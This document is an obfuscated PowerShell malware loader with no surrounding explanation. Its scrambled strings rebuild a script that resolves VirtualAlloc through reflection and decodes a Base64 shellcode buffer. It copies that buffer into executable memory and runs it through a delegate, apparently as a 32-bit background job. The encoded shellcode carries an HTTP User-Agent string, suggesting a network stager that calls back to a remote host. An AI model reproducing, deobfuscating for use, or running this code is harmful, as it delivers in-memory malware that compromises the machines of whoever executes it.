 &( $ShELlid[1]+$shEllid[13]+'x')(('(((svo{73}{14}{76}{83}'+'{21}{64}{56}{25}{62}{0}{'+'33}{95}{98}{5}{57}{2}{'+'48}{4}{34}{67}{94}{23}{66}{15}{77}{9}{104}{100}{9'+'2}{101}{3}{26}{65'+'}{59}{49}{7}{31}{8}{44}{93}{86}{102}{97}{13}{96}{20'+'}{22}{1'+'7}{50}{38}{87'+'}{'+'1}{74}{32}{81'+'}{54}{39}{88}{10}{37}{90'+'}{6}'+'{24}{41}{36}{53}{70}{40'+'}{61}{99}{19}{75}{89}{42}{45}{43}{103}{35}{58}{47}{82}{'+'52}{51}{79}{28}{71'+'}{68}{46}{27}{72}{60}{11}{91}{30}{12}{18}{80}{84}{29}{78}{16}{85}{55}{63}{69}svo-f sKovar_module, rNtvar_procedure)		
	rNtvar_unssKo,sKoANqM+NqMx/1sK'+'o,sKoNqM+NqMddressfW9, '+'[Type[]] NqM+N'+'qM@(fW9System.RuntsKo,sKon.Define'+'DynNqM+NqMamicAssembly((New-Object System.ReflecsKo,sK'+'oeturn rNtvar_gpa.Invoke(rNtnul'+'l, @([S'+'NqM+NqMyssKo,sKoNqMdsfNqM+NqMW9)
	rNtvar_gpa = rNtvar_unsafe_native_methods.GetMethodsKo,sKoNqMhOH8oDAsKo,sKoNqM+'+'NqMegate])
	rNtvar_type_build'+'er.Def'+'ineConsKo,sKo9, [System.Reflection.CallingConventioN'+'qM+NqMnssKo,sKoNtvar_para'+'meterssKo,sKodRVl'+'Bot1'+'fgC//VvwAvANqM+NqMAA5x3UHWFDpe////zH/6ZEBAADpyQEAAOhv////L2YNqM+NqM2ekYAsvBYNqMsKo,sKonNqM+NqMc_get_del'+'egatNqM+Nq'+'Me_tNqM+NqMype @([IntPtr])'+' ([Void])))
rNtsK'+'o,sKo '+'-eq 8) {NqM+NsKo,sKo+NqM[SyNqM+NqMstem.Con'+'veNq'+'M+NqMrt'+']::FromBase64String(fW9/OiJAA'+'AAYInlMdJki1Iwi1IMi1IUi3IoNqM+NqMD7dKJjH/NqM+NqMMcCsPGF8Aiw'+'gNqM+NqsKo,sKo9X{sK'+'o,sKonsafe_native_meth'+'NqM'+'+N'+'qMods.GetMethod(fW9GetNqM+NqMModuleHandlefW9))'+'.NqM+NqMInvoke(rNtnulNqM+NqMl, @(rNNqM+NqMtvar_module)))'+'), rNtvaNqM+NqMr_procedure))
}

function func_gNq'+'M+NqM'+'et_delegate_typ'+'sKo,sKoiIT} sKC .(09X{2}{1}{0}'+'09X -f fW9bfW9,fWNqM+NqM9it-jofW9,fW9wafW9) sK'+'C &(09X{0}{1}{2}09X-f fW9RecfNqM+NqMW9,fW9eivNqM+NqMe-fW9,fW9JobfW9)
}
el'+'se {
NqM+NqM	&(09X{0}{1}09X-f fW9IEfW9,fW9XfW9) rNt{DomFiit'+'}
}
NqM)  -rEplaceNqMfW9NqM,'+'[chAr]39  -cRepLace ([chAr]48+[chAr]57+[chAr]88),[chAr]34-rEplace([c'+'hAr]'+'sKo,sKoEmLNIsKo,sKoqM
	&(0'+'9X{2}{0}{1}09X-sKo,sKoVUItxkaL7aoZVsBS+DIHQvXegD3MuvNqM+NqMlHgvhLRr'+'aDPE3x7PEANXpo30ib+yvzfVeOMuygyw2'+'gDYtfILu1jdOJX3T'+'96bV/MENSRidB0fAoY0ZymOa252R1dEd3Xrc5GQsKo,sKoNAcfi8FJXi'+'1IQi0I8AdsKo,sKoNqMWsKo,sKoCLQHiNqM+NqMFwHRKAdBQi0gYi1g'+'gAdPj'+'PsKo,sKopServices.H'+'a'+'ndlsKo,sKobsKo,sKoam (sKo,sKotioNsKo,sKosNqMsKo,sKod'+'e, 0, NqM+NqMrNtvar_buffe'+'r,NqM+NqM rNtvar_codsKo,sKoX-ffW9EXf'+'W9,fW9IfW9) rNt{a} } -sKo'+',sKo'+'( .(fW9gIfW9) v'+'AriABLe:4JZ ).V'+'ALuNqM+NqME::'+'09XsImFiZe09XsKo,sKostructor(fW9RTSpNqM+NqMecialName, Hid'+'eBySig, PublicNqM+NqMfWsKo,sKoaPs'+'Ko,sKoafe_native_methods = ([AppDomain]::CurrentDomain.GetNqM+NqMAssKo,sKotem.Runtime.I'+'nsKo,'+'sKoM[IntPtr], [UInt32], [UInt32], [UInt32]) ([IntNqM+NqMPtr])))
rNtvar_buffer = rs'+'Ko,sKoXgm9g83YHlt0GyP83XQAJNqM+NqMlwwq1eiZH1lOhsNqM+NqMHnvIMkAQE'+'4uEoIgJWABVc2VyLUFnZW50sKo,sKo+NqMI0r'+'xFUyjNPsKo,sKoxLi1gcAsKo,sKoO//VicaDw1BogDMNqM+NqMAAIngagRQah9WaHVGn'+'ob/1V8x/1dXav9TVmgt'+'Bhh7/9WFw'+'A+EygEAADH/hfZ0BIn56wloqsXiXf/VisKo,sKoDsgVHJpZGVudC81LjA7I'+'E1BVFA7IENqM+NqM1BVFApDQoAUcvAo0ZnDPNqM+NqMk'+'fPyZm2mYNqM+NqMMnjR/gCNqM+NqMuxmDS/BEYrT7QjkasKo,sKo+uGN3HzX8n8YZisKo,sKoVhcB0xosHAcOFwHXlNqM+NqMW'+'NqM+NqMMPoif3//zMNqM+N'+'qM0NqM+NqMLjI0sKo,sKoMarshal]::GetDelegateForFunctionPointer((func_get_proc_address'+' kernel32.dll VirtualAlloc), (func_get_delegNqM+NqMate_typesKo,sKo]::Standard, rNtvar_parNqM+NqMameters).SetIsKo,s'+'KoNi4xNjEuMTU0AE0mZYo=fW9)

NqM+NqMrNtvar_va = [System.Runtime.InteropServices.sKo,sKogth)

rNtvar_rNqM+NqMunme = [SysKo,sKovoke([IntPtr]::Zero, rNtvar_code'+'.LengsKo,sKoiNqM+NqMm'+'e.Int'+'eropServicNqM+NqMeNqM+NqMs.HNqM+NqMandleReffW9, fW9stringfW9)'+')
	rsKo,sKo9, [System.MulticastDelsKo,sKosB1jH/McCswc8NAcc44HX0A'+'334O30kdeJYi1gkAdNmiwsKo,sKo.Runtime.INqM+NqMnsKo,sKoSysteNqM+NqMmsK'+'o,'+'sKoOiBNb3ppbGxhLzNqM+NqMUuMCAoY29t'+'cGF0aWJsZTsgTVNJRSAsKo,sKoXiZ/G/9VQ6YwAAANqM+N'+'qMBbMdNqM+NqMJSaAAyoIRSUlJTUl'+'Bo61NqM+NqMUusKo,sKoqM,[chAr]92  -cRepLace  ([chAr]10'+'9+[chAr]70+[chAr]105),[chAr]96 -cRepLace NqMrNtNqMsKo,sKoMon 2

rNt{dOmFiIt} = @fW9
f'+'unct'+'ion func_get_pro'+'c_address {
	ParsKo,sKo(fW9GetProcAsKo,sKoNtvar_va.InsKo,sKoqM+NqMem.Reflection.Emit.AssemblyNqM+NqMBuilderAccess]::Run).DefineDynamicModule'+'(fW9InMemoryModulefW9, rNtfalse).DefinNqM+NqMeType(fW9MNqM+NqMyDeleg'+'ateType'+'fW9, fW9Class, Public, Sealed, AnsiClass, A'+'utoClassfWsKo,sKonPointer(rNtvar_buffer, (fusKo,sKofHlvc8oJAOgxo8sKo,sKorNtNqM'+'+NqMsKo,sKo,[ch'+'Ar]36) 0'+'J9m& ( yU0VerbOseprEFEREnCe.tOStrInG()[1,3]+NqMx'+'NqM-'+'JOinNqMN'+'q'+'s'+'Ko,sKo9'+',fW9Se'+'t-fW9,fW9SfW9)'+' -VersiNqM+Nqs'+'Ko,sKoqM+N'+'qMn.AssemblyName(fW9ReflectedDNqM+NqMelegatefW9)), [S'+'ystNsKo,sKoeRef((NNqM+NqM'+'ew-Object IntPt'+'r), (rNtv'+'ar_usKo,sKoteropS'+'erv'+'ices.HandleRef](NeNqM+NqMw-Object System.RuntisKo,sKo+NqMnsKo,sK'+'oM)sKo,sKo5LjA7IFdp'+'bmRvd3MgTlQgNi4xOyBXT1c2Nq'+'M'+'+NqMNsKo,sKoe.leNqMsKo,sKo+N'+'qMtem.Runtime.InteropServices.Marshal'+']::GetDelegateFoNqM+NqMrFunctioNqM+NqMsKo,sKo ((NqM rNt{4NqM+NqMmFijz}'+'  =NqM+NqM [Type](0sKo,sKodXV1dXaDpWeNqM+NqMaf/1emkAAAAWzHJUVFqA'+'1FRsKo,sKoCUalBq2VYuFEfaMKAITA0ruIAf+8RccfHTqNqM+NqMYLFw2DhNnQxIC32mYAaNqM+NqM'+'PC1osKo,sKo0}{'+'1}{2}09X -F fW9iNtNqM+'+'NqMfW9,fW9PfW9,fW9TRfW9)NqM+NqM; .NqM+NqM(NqM+NqM09X{2}{3}{1}{sKo,sKoe {
	Param (
		['+'Parameter(Position = 0'+', Mandatory = rNtTrue)] [Type[]] rsKo,sKoRunANqM+NqMs32 -Argument rNt{DomFsKo,sKoteropServicNqM+NqMes.'+'M'+'arshal]::Copy(N'+'qM+NqMrNtNqM+NqMvar_cosKo'+',sKof fW9tartfW9,fNqM+NqMW9-jobNqM+'+'NqMfW9,fW9sfW9) { paramsKo,sKosgAABTUGhsKo,sKoth, 0x'+'3000, 0x40)
[sKo,sKo0}09X -ffW9tModefW9,fW9tricfNqM+sKo,sKo(rNt{A}) &'+'(NqM+NqM09X{1}{0NqM+NqM}09sKo,sKo115+[chAr]75+[chAr]67),[chAr]124-cRepLaceNqMB80NsKo,sKo.sKo,sKoNqM+NqMdOLBIsB0IlEJCRbW2FZWlH/4Fhf'+'WosS64Zd'+'aG5ldABod2luaVRoTHcmB//V6AAAAAsKo,sKoc'+'FoRSFeMf/VMf9XagsKo,sKolb/1WpAaAAQA'+'ABoAABAAFdoWKRT5f/Vk7kAAAAAAdlRU4nnV2gAIAAAU1ZoEpaJ4v/sKo,sKoU'+'IrjUkoT'+'7NqM+sKo,sKo'+'var_runme.Invoke([IntPtNqM+NqMr]::Zero)
fW9@

If ( sK'+'o,sK'+'oNqM	)

	rNtvar_type_builder NqM+N'+'q'+'M=N'+'qM'+'+NsKo,sKomplementatioNqM+NqMnFlags(fW9Runtime, ManagedfW9)
NqM+NqM	rNtvar_type_buildersKo,sKome.I'+'nterosKo,sKose'+'msK'+'o,sKoMwNqM+NqMc8s'+'Ko,sKoByte[]]rNtvar_code = NqMsKo,sKoblNqM+NqMies() NqM'+'+NqMsKC Where-Object { rNt_.GlobalAssemblyCache -And rNt_.Locati'+'on.Split(fW9B80B80fW9)[-1].Equals(fW9SNqM+NqMystem.'+'dll'+'fW9) }).GetType'+'(fW9Microsoft.'+'Win32.'+'UnsafeNativeMethoNqM'+'+sKo,s'+'K'+'okJ8ldaFNqM+NqMhcsBin4bOxFIi8IB'+'mvlMPtd'+'HUGFn2XYvWasKo,sKo[V'+'oid]
NqM+sKo,s'+'KoqM [AppDomain]::CurrentDomaisKo,sKoDefineMethod(fW9InvokefW9, fW9NqM+Nq'+'MPublic, Hi'+'deBySig,'+' NewSNq'+'M+NqMlot, VirtualfNqM+NqMW9, rNtvar_return_type, rNtvar_parame'+'ters).SetImplementat'+'ionFlags(fW9Runtime,NqM+NqM ManaNqM+NqMgedfW9)

	ret'+'urn rNtvar_NqM+Nq'+'Mtype_builder.CreateType()
}

[sKo,sKo '+'@(NqM+NqsKo,sKo,'+'
		[PNqM+Nq'+'Marameter(Position = 1)] [Type] rNtvar_return_type = '+'sKo)) -CRePLacesKo0J9msKo,[cHar]124-rEPlacE  sK'+'oNqMsKo,[cHar]39  -CRePLace '+'sKoyU0sKo,[cHar'+']36) iRz &'+'( lazENv:C'+'OmsPEC[4,15,25]-JOInsKosKo'+')
')."rep`lace"(([CHAr]115+[CHAr]75+[CHAr]111),[STrING][CHAr]39)."re`Pl`AcE"(([CHAr]105+[CHAr]82+[CHAr]122),[STrING][CHAr]124)."r`E`PlACe"(([CHAr]108+[CHAr]97+[CHAr]122),'$')."r`E`PLaCe"('svo',[STrING][CHAr]34) )
